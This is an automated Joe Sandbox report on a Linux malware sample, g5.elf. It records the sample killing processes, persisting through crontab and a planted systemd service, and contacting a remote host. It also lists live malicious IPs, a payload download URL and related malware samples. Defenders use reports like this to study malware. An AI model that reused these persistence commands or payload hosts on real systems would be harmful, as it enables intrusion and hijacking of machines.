Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
g5.elf

Overview

General Information

Sample name:g5.elf
Analysis ID:1589941
MD5:a31c5120545d3d83e30e3112babeb090
SHA1:b13f64e6fa99c9cc2273f476b3ffb19d67786bea
SHA256:3a3df579db037959687c6e759bf139097f527f3143ffacc0000b7c6f6ce1e6ab
Tags:elfuser-abuse_ch
Infos:

Detection

Score:64
Range:0 - 100
Whitelisted:false

Signatures

Multi AV Scanner detection for submitted file
Drops files in suspicious directories
Executes the "crontab" command typically for achieving persistence
Sample tries to kill multiple processes (SIGKILL)
Sample tries to persist itself using cron
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "systemctl" command used for controlling the systemd system and service manager
Reads system information from the proc file system
Sample has stripped symbol table
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Uses the "uname" system call to query kernel version information (possible evasion)
Writes shell script file to disk with an unusual file extension

Classification

Joe Sandbox version:42.0.0 Malachite
Analysis ID:1589941
Start date and time:2025-01-13 10:57:10 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 54s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:g5.elf
Detection:MAL
Classification:mal64.spre.troj.evad.linELF@0/6@0/0
  • VT rate limit hit for: http://103.136.41.100/g5
Command:/tmp/g5.elf
PID:5462
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
gosh that chinese family at the other table sure ate a lot
Standard Error:
  • system is lnxubuntu20
  • g5.elf (PID: 5462, Parent: 5386, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/g5.elf
    • g5.elf New Fork (PID: 5479, Parent: 5462)
    • sh (PID: 5479, Parent: 5462, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl daemon-reload > /dev/null 2>&1"
      • sh New Fork (PID: 5481, Parent: 5479)
      • systemctl (PID: 5481, Parent: 5479, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl daemon-reload
    • g5.elf New Fork (PID: 5485, Parent: 5462)
    • sh (PID: 5485, Parent: 5462, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl start hello.service > /dev/null 2>&1"
      • sh New Fork (PID: 5491, Parent: 5485)
      • systemctl (PID: 5491, Parent: 5485, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl start hello.service
    • g5.elf New Fork (PID: 5492, Parent: 5462)
    • sh (PID: 5492, Parent: 5462, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "crontab /tmp/crontab.tmp > /dev/null 2>&1"
      • sh New Fork (PID: 5497, Parent: 5492)
      • crontab (PID: 5497, Parent: 5492, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab /tmp/crontab.tmp
    • g5.elf New Fork (PID: 5498, Parent: 5462)
    • sh (PID: 5498, Parent: 5462, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "/etc/init.d/hello > /dev/null 2>&1"
      • sh New Fork (PID: 5500, Parent: 5498)
    • g5.elf New Fork (PID: 5501, Parent: 5462)
      • g5.elf New Fork (PID: 5503, Parent: 5501)
        • g5.elf New Fork (PID: 5505, Parent: 5503)
        • g5.elf New Fork (PID: 5507, Parent: 5503)
        • g5.elf New Fork (PID: 5509, Parent: 5503)
  • wrapper-2.0 (PID: 5464, Parent: 3147, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libsystray.so 6 12582920 systray "Notification Area" "Area where notification icons appear"
  • wrapper-2.0 (PID: 5465, Parent: 3147, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libstatusnotifier.so 7 12582921 statusnotifier "Status Notifier Plugin" "Provides a panel area for status notifier items (application indicators)"
  • wrapper-2.0 (PID: 5466, Parent: 3147, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libpulseaudio-plugin.so 8 12582922 pulseaudio "PulseAudio Plugin" "Adjust the audio volume of the PulseAudio sound system"
  • wrapper-2.0 (PID: 5467, Parent: 3147, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libxfce4powermanager.so 9 12582923 power-manager-plugin "Power Manager Plugin" "Display the battery levels of your devices and control the brightness of your display"
  • wrapper-2.0 (PID: 5468, Parent: 3147, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libnotification-plugin.so 10 12582924 notification-plugin "Notification Plugin" "Notification plugin for the Xfce panel"
  • wrapper-2.0 (PID: 5471, Parent: 3147, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libactions.so 14 12582925 actions "Action Buttons" "Log out, lock or other system actions"
  • systemd New Fork (PID: 5483, Parent: 5482)
  • snapd-env-generator (PID: 5483, Parent: 5482, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • cleanup
No yara matches
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: g5.elfVirustotal: Detection: 38%Perma Link
Source: global trafficTCP traffic: 192.168.2.13:52106 -> 77.90.22.16:5625
Source: global trafficTCP traffic: 192.168.2.13:36629 -> 1.1.1.1:53
Source: /tmp/g5.elf (PID: 5462)Socket: 127.0.0.1:23476Jump to behavior
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 77.90.22.16
Source: unknownTCP traffic detected without corresponding DNS query: 77.90.22.16
Source: unknownTCP traffic detected without corresponding DNS query: 77.90.22.16
Source: unknownTCP traffic detected without corresponding DNS query: 77.90.22.16
Source: unknownTCP traffic detected without corresponding DNS query: 77.90.22.16
Source: unknownTCP traffic detected without corresponding DNS query: 77.90.22.16
Source: unknownTCP traffic detected without corresponding DNS query: 77.90.22.16
Source: unknownTCP traffic detected without corresponding DNS query: 77.90.22.16
Source: g5.elfString found in binary or memory: http://%d.%d.%d.%d/%s
Source: g5.elf, 5462.1.00007fed90033000.00007fed90039000.rw-.sdmp, g5.elf, 5501.1.00007fed90033000.00007fed90039000.rw-.sdmpString found in binary or memory: http://1/wget.sh
Source: hello.service.12.dr, hello.12.dr, tmp.y5bUwT.38.dr, crontab.tmp.12.drString found in binary or memory: http://103.136.41.100/g5
Source: g5.elf, 5462.1.00007fed90033000.00007fed90039000.rw-.sdmp, g5.elf, 5501.1.00007fed90033000.00007fed90039000.rw-.sdmpString found in binary or memory: http://9/curl.sh
Source: g5.elf, 5462.1.00007fed90033000.00007fed90039000.rw-.sdmp, g5.elf, 5501.1.00007fed90033000.00007fed90039000.rw-.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: g5.elf, 5462.1.00007fed90033000.00007fed90039000.rw-.sdmp, g5.elf, 5501.1.00007fed90033000.00007fed90039000.rw-.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/

System Summary

barindex
Source: /tmp/g5.elf (PID: 5462)SIGKILL sent: pid: 3104, result: successfulJump to behavior
Source: /tmp/g5.elf (PID: 5462)SIGKILL sent: pid: 3161, result: successfulJump to behavior
Source: /tmp/g5.elf (PID: 5462)SIGKILL sent: pid: 3162, result: successfulJump to behavior
Source: /tmp/g5.elf (PID: 5462)SIGKILL sent: pid: 3163, result: successfulJump to behavior
Source: /tmp/g5.elf (PID: 5462)SIGKILL sent: pid: 3164, result: successfulJump to behavior
Source: /tmp/g5.elf (PID: 5462)SIGKILL sent: pid: 3165, result: successfulJump to behavior
Source: /tmp/g5.elf (PID: 5462)SIGKILL sent: pid: 3170, result: successfulJump to behavior
Source: /tmp/g5.elf (PID: 5462)SIGKILL sent: pid: 3182, result: successfulJump to behavior
Source: /tmp/g5.elf (PID: 5462)SIGKILL sent: pid: 3212, result: successfulJump to behavior
Source: /tmp/g5.elf (PID: 5462)SIGKILL sent: pid: 5464, result: successfulJump to behavior
Source: /tmp/g5.elf (PID: 5462)SIGKILL sent: pid: 5465, result: successfulJump to behavior
Source: /tmp/g5.elf (PID: 5462)SIGKILL sent: pid: 5466, result: successfulJump to behavior
Source: /tmp/g5.elf (PID: 5462)SIGKILL sent: pid: 5467, result: successfulJump to behavior
Source: /tmp/g5.elf (PID: 5462)SIGKILL sent: pid: 5468, result: successfulJump to behavior
Source: /tmp/g5.elf (PID: 5462)SIGKILL sent: pid: 5471, result: successfulJump to behavior
Source: ELF static info symbol of initial sample.symtab present: no
Source: /tmp/g5.elf (PID: 5462)SIGKILL sent: pid: 3104, result: successfulJump to behavior
Source: /tmp/g5.elf (PID: 5462)SIGKILL sent: pid: 3161, result: successfulJump to behavior
Source: /tmp/g5.elf (PID: 5462)SIGKILL sent: pid: 3162, result: successfulJump to behavior
Source: /tmp/g5.elf (PID: 5462)SIGKILL sent: pid: 3163, result: successfulJump to behavior
Source: /tmp/g5.elf (PID: 5462)SIGKILL sent: pid: 3164, result: successfulJump to behavior
Source: /tmp/g5.elf (PID: 5462)SIGKILL sent: pid: 3165, result: successfulJump to behavior
Source: /tmp/g5.elf (PID: 5462)SIGKILL sent: pid: 3170, result: successfulJump to behavior
Source: /tmp/g5.elf (PID: 5462)SIGKILL sent: pid: 3182, result: successfulJump to behavior
Source: /tmp/g5.elf (PID: 5462)SIGKILL sent: pid: 3212, result: successfulJump to behavior
Source: /tmp/g5.elf (PID: 5462)SIGKILL sent: pid: 5464, result: successfulJump to behavior
Source: /tmp/g5.elf (PID: 5462)SIGKILL sent: pid: 5465, result: successfulJump to behavior
Source: /tmp/g5.elf (PID: 5462)SIGKILL sent: pid: 5466, result: successfulJump to behavior
Source: /tmp/g5.elf (PID: 5462)SIGKILL sent: pid: 5467, result: successfulJump to behavior
Source: /tmp/g5.elf (PID: 5462)SIGKILL sent: pid: 5468, result: successfulJump to behavior
Source: /tmp/g5.elf (PID: 5462)SIGKILL sent: pid: 5471, result: successfulJump to behavior
Source: classification engineClassification label: mal64.spre.troj.evad.linELF@0/6@0/0

Persistence and Installation Behavior

barindex
Source: /bin/sh (PID: 5497)Crontab executable: /usr/bin/crontab -> crontab /tmp/crontab.tmpJump to behavior
Source: /usr/bin/crontab (PID: 5497)File: /var/spool/cron/crontabs/tmp.y5bUwTJump to behavior
Source: /tmp/g5.elf (PID: 5462)File opened: /proc/3122/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 5462)File opened: /proc/3122/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 5462)File opened: /proc/3122/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 5462)File opened: /proc/3122/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 5462)File opened: /proc/3122/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 5462)File opened: /proc/3117/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 5462)File opened: /proc/3117/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 5462)File opened: /proc/3117/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 5462)File opened: /proc/3117/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 5462)File opened: /proc/3117/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 5462)File opened: /proc/3114/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 5462)File opened: /proc/3114/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 5462)File opened: /proc/3114/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 5462)File opened: /proc/3114/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 5462)File opened: /proc/3114/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 5462)File opened: /proc/914/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 5462)File opened: /proc/914/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 5462)File opened: /proc/914/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 5462)File opened: /proc/914/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 5462)File opened: /proc/914/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 5462)File opened: /proc/917/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 5462)File opened: /proc/917/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 5462)File opened: /proc/917/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 5462)File opened: /proc/917/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 5462)File opened: /proc/917/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 5462)File opened: /proc/3134/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 5462)File opened: /proc/3134/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 5462)File opened: /proc/3134/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 5462)File opened: /proc/3134/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 5462)File opened: /proc/3134/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 5462)File opened: /proc/3375/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 5462)File opened: /proc/3375/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 5462)File opened: /proc/3375/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 5462)File opened: /proc/3375/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 5462)File opened: /proc/3375/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 5462)File opened: /proc/3132/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 5462)File opened: /proc/3132/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 5462)File opened: /proc/3132/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 5462)File opened: /proc/3132/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 5462)File opened: /proc/3132/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 5462)File opened: /proc/3095/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 5462)File opened: /proc/3095/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 5462)File opened: /proc/3095/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 5462)File opened: /proc/3095/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 5462)File opened: /proc/3095/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 5462)File opened: /proc/1866/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 5462)File opened: /proc/1866/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 5462)File opened: /proc/1866/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 5462)File opened: /proc/1866/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 5462)File opened: /proc/1866/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 5462)File opened: /proc/1745/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 5462)File opened: /proc/1745/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 5462)File opened: /proc/1745/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 5462)File opened: /proc/1745/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 5462)File opened: /proc/1745/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 5462)File opened: /proc/1/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 5462)File opened: /proc/1/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 5462)File opened: /proc/1/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 5462)File opened: /proc/1/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 5462)File opened: /proc/1/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 5462)File opened: /proc/1588/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 5462)File opened: /proc/1588/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 5462)File opened: /proc/1588/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 5462)File opened: /proc/1588/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 5462)File opened: /proc/1588/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 5462)File opened: /proc/884/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 5462)File opened: /proc/884/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 5462)File opened: /proc/884/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 5462)File opened: /proc/884/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 5462)File opened: /proc/884/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 5462)File opened: /proc/1982/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 5462)File opened: /proc/1982/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 5462)File opened: /proc/1982/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 5462)File opened: /proc/1982/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 5462)File opened: /proc/1982/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 5462)File opened: /proc/765/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 5462)File opened: /proc/765/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 5462)File opened: /proc/765/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 5462)File opened: /proc/765/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 5462)File opened: /proc/765/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 5462)File opened: /proc/3246/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 5462)File opened: /proc/3246/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 5462)File opened: /proc/3246/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 5462)File opened: /proc/3246/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 5462)File opened: /proc/3246/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 5462)File opened: /proc/800/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 5462)File opened: /proc/800/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 5462)File opened: /proc/800/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 5462)File opened: /proc/800/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 5462)File opened: /proc/800/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 5462)File opened: /proc/767/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 5462)File opened: /proc/767/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 5462)File opened: /proc/767/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 5462)File opened: /proc/767/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 5462)File opened: /proc/767/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 5462)File opened: /proc/1906/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 5462)File opened: /proc/1906/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 5462)File opened: /proc/1906/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 5462)File opened: /proc/1906/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 5462)File opened: /proc/1906/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 5462)File opened: /proc/1906/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 5462)File opened: /proc/802/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 5462)File opened: /proc/802/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 5462)File opened: /proc/802/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 5462)File opened: /proc/802/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 5462)File opened: /proc/802/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 5479)Shell command executed: sh -c "systemctl daemon-reload > /dev/null 2>&1"Jump to behavior
Source: /tmp/g5.elf (PID: 5485)Shell command executed: sh -c "systemctl start hello.service > /dev/null 2>&1"Jump to behavior
Source: /tmp/g5.elf (PID: 5492)Shell command executed: sh -c "crontab /tmp/crontab.tmp > /dev/null 2>&1"Jump to behavior
Source: /tmp/g5.elf (PID: 5498)Shell command executed: sh -c "/etc/init.d/hello > /dev/null 2>&1"Jump to behavior
Source: /bin/sh (PID: 5481)Systemctl executable: /usr/bin/systemctl -> systemctl daemon-reloadJump to behavior
Source: /bin/sh (PID: 5491)Systemctl executable: /usr/bin/systemctl -> systemctl start hello.serviceJump to behavior
Source: /tmp/g5.elf (PID: 5462)Reads from proc file: /proc/statJump to behavior
Source: /tmp/g5.elf (PID: 5462)Writes shell script file to disk with an unusual file extension: /etc/init.d/helloJump to dropped file

Hooking and other Techniques for Hiding and Protection

barindex
Source: /tmp/g5.elf (PID: 5462)File: /etc/init.d/helloJump to dropped file
Source: /tmp/g5.elf (PID: 5462)Queries kernel information via 'uname': Jump to behavior
Source: g5.elf, 5462.1.00007ffddab7e000.00007ffddab9f000.rw-.sdmp, g5.elf, 5501.1.00007ffddab7e000.00007ffddab9f000.rw-.sdmpBinary or memory string: 5x86_64/usr/bin/qemu-arm/tmp/g5.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/g5.elf
Source: g5.elf, 5462.1.0000556686097000.00005566861e8000.rw-.sdmp, g5.elf, 5501.1.0000556686097000.00005566861e8000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/arm
Source: g5.elf, 5462.1.00007ffddab7e000.00007ffddab9f000.rw-.sdmpBinary or memory string: /tmp/qemu-open.x5semb
Source: g5.elf, 5462.1.00007ffddab7e000.00007ffddab9f000.rw-.sdmp, g5.elf, 5501.1.00007ffddab7e000.00007ffddab9f000.rw-.sdmpBinary or memory string: /usr/bin/qemu-arm
Source: g5.elf, 5462.1.0000556686097000.00005566861e8000.rw-.sdmp, g5.elf, 5501.1.0000556686097000.00005566861e8000.rw-.sdmpBinary or memory string: fU!/etc/qemu-binfmt/arm
Source: g5.elf, 5462.1.00007ffddab7e000.00007ffddab9f000.rw-.sdmpBinary or memory string: fU/tmp/qemu-open.x5semb:
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid Accounts1
Scheduled Task/Job
1
Systemd Service
1
Systemd Service
1
Masquerading
1
OS Credential Dumping
11
Security Software Discovery
Remote ServicesData from Local System1
Non-Standard Port
Exfiltration Over Other Network Medium1
Service Stop
CredentialsDomainsDefault AccountsScheduled Task/Job1
Scheduled Task/Job
1
Scheduled Task/Job
RootkitLSASS Memory1
System Information Discovery
Remote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAt1
Scripting
Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
No configs have been found
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1589941 Sample: g5.elf Startdate: 13/01/2025 Architecture: LINUX Score: 64 51 1.1.1.1, 36629, 53 CLOUDFLARENETUS Australia 2->51 53 77.90.22.16, 52106, 5625 ASGHOSTNETDE Germany 2->53 55 Multi AV Scanner detection for submitted file 2->55 9 g5.elf 2->9         started        13 xfce4-panel wrapper-2.0 2->13         started        15 xfce4-panel wrapper-2.0 2->15         started        17 5 other processes 2->17 signatures3 process4 file5 45 /tmp/crontab.tmp, troff 9->45 dropped 47 /etc/init.d/hello, Bourne-Again 9->47 dropped 57 Sample tries to kill multiple processes (SIGKILL) 9->57 59 Drops files in suspicious directories 9->59 19 g5.elf sh 9->19         started        21 g5.elf sh 9->21         started        23 g5.elf sh 9->23         started        25 2 other processes 9->25 signatures6 process7 process8 27 sh crontab 19->27         started        31 sh systemctl 21->31         started        33 sh systemctl 23->33         started        35 g5.elf 25->35         started        37 sh 25->37         started        file9 49 /var/spool/cron/crontabs/tmp.y5bUwT, troff 27->49 dropped 61 Sample tries to persist itself using cron 27->61 63 Executes the "crontab" command typically for achieving persistence 27->63 39 g5.elf 35->39         started        41 g5.elf 35->41         started        43 g5.elf 35->43         started        signatures10 process11

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
g5.elf38%VirustotalBrowse
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://103.136.41.100/g5100%Avira URL Cloudmalware
No contacted domains info
NameSourceMaliciousAntivirus DetectionReputation
http://103.136.41.100/g5hello.service.12.dr, hello.12.dr, tmp.y5bUwT.38.dr, crontab.tmp.12.drfalse
  • Avira URL Cloud: malware
unknown
http://%d.%d.%d.%d/%sg5.elffalse
    high
    http://1/wget.shg5.elf, 5462.1.00007fed90033000.00007fed90039000.rw-.sdmp, g5.elf, 5501.1.00007fed90033000.00007fed90039000.rw-.sdmpfalse
      high
      http://schemas.xmlsoap.org/soap/encoding/g5.elf, 5462.1.00007fed90033000.00007fed90039000.rw-.sdmp, g5.elf, 5501.1.00007fed90033000.00007fed90039000.rw-.sdmpfalse
        high
        http://9/curl.shg5.elf, 5462.1.00007fed90033000.00007fed90039000.rw-.sdmp, g5.elf, 5501.1.00007fed90033000.00007fed90039000.rw-.sdmpfalse
          high
          http://schemas.xmlsoap.org/soap/envelope/g5.elf, 5462.1.00007fed90033000.00007fed90039000.rw-.sdmp, g5.elf, 5501.1.00007fed90033000.00007fed90039000.rw-.sdmpfalse
            high
            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs
            IPDomainCountryFlagASNASN NameMalicious
            77.90.22.16
            unknownGermany
            12586ASGHOSTNETDEfalse
            1.1.1.1
            unknownAustralia
            13335CLOUDFLARENETUSfalse
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            77.90.22.16g6.elfGet hashmaliciousUnknownBrowse
              g3.elfGet hashmaliciousUnknownBrowse
                g4.elfGet hashmaliciousUnknownBrowse
                  g3.elfGet hashmaliciousUnknownBrowse
                    g5.elfGet hashmaliciousUnknownBrowse
                      g4.elfGet hashmaliciousUnknownBrowse
                        g6.elfGet hashmaliciousUnknownBrowse
                          g3.elfGet hashmaliciousUnknownBrowse
                            m1.elfGet hashmaliciousUnknownBrowse
                              m5.elfGet hashmaliciousUnknownBrowse
                                1.1.1.1watchdog.elfGet hashmaliciousXmrigBrowse
                                • 1.1.1.1:8080/
                                6fW0GedR6j.xlsGet hashmaliciousUnknownBrowse
                                • 1.1.1.1/ctrl/playback.php
                                PO-230821_pdf.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                • www.974dp.com/sn26/?kJBLpb8=qaEGeuQorcUQurUZCuE8d9pas+Z0M0brqtX248JBolEfq8j8F1R9i1jKZexhxY54UlRG&ML0tl=NZlpi
                                AFfv8HpACF.exeGet hashmaliciousUnknownBrowse
                                • 1.1.1.1/
                                INVOICE_90990_PDF.exeGet hashmaliciousFormBookBrowse
                                • www.quranvisor.com/usvr/?mN9d3vF=HHrW7cA9N4YJlebHFvlsdlDciSnnaQItEG8Ccfxp291VjnjcuwoPACt7EOqEq4SWjIf8&Pjf81=-Zdd-V5hqhM4p2S
                                Go.exeGet hashmaliciousUnknownBrowse
                                • 1.1.1.1/
                                No context
                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                CLOUDFLARENETUShttp://aeromorning.comGet hashmaliciousUnknownBrowse
                                • 104.26.4.102
                                https://ngk.ae/hurda.html?email=lara.sutton@southerntrust.hscni.netGet hashmaliciousHTMLPhisherBrowse
                                • 104.17.25.14
                                elitebotnet.x86.elfGet hashmaliciousMirai, OkiruBrowse
                                • 172.68.1.238
                                MACHINE SPECIFICATIONS.exeGet hashmaliciousFormBookBrowse
                                • 172.67.132.227
                                Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeGet hashmaliciousFormBookBrowse
                                • 104.21.13.141
                                QUOTATION#090125-ELITEMARINE.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                • 104.21.80.1
                                Order_list.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                • 104.21.64.1
                                Receipt-2502-AJL2024.exeGet hashmaliciousMassLogger RATBrowse
                                • 104.21.32.1
